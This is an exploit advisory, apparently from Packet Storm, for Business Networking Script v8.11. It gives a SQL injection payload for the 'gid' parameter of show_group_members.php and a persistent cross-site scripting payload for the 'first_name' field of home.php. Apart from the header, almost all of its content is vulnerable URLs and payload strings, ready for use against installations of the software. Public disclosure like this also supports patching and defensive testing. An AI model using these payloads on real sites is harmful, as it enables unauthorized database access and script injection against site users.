Business Networking Script version 8.11 suffers from cross site scripting and remote SQL injection vulnerabilities.
36e2deb3815023e40fa8aec4583a08e48c02ed04d0311a76521be073ebf33b0a# Exploit Title : ----------- : Business Networking Script v8.11- SQLi &
Persistent Cross Site Scripting
# Author : ----------------- : Ahmet Gurel
# Google Dork : --------- : -
# Date : -------------------- : 16/01/2017
# Type : -------------------- : webapps
# Platform : --------------- : PHP
# Vendor Homepage : http://itechscripts.com/business-networking-script/
# Sofware Price and Demo : $299.00
http://professional-network.itechscripts.com
########## 1-SQL Injection ##########
##### Vulnerable Parameter Type : GET
##### Vulnerable Parameter : gid
##### Vulnerable URL :
http://localhost/[PATH]/show_group_members.php?gid=[SQLi]
##### SQLi Parameter : ' OR '1'='1
########## 2-Persistent XSS Payload ##########
##### Vulnerable URL : http://localhost/[PATH]/home.php
##### Vuln. Parameter: first_name=
##### PAYLOAD : '"--></style></Script><Script>alert(1)</Script>
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed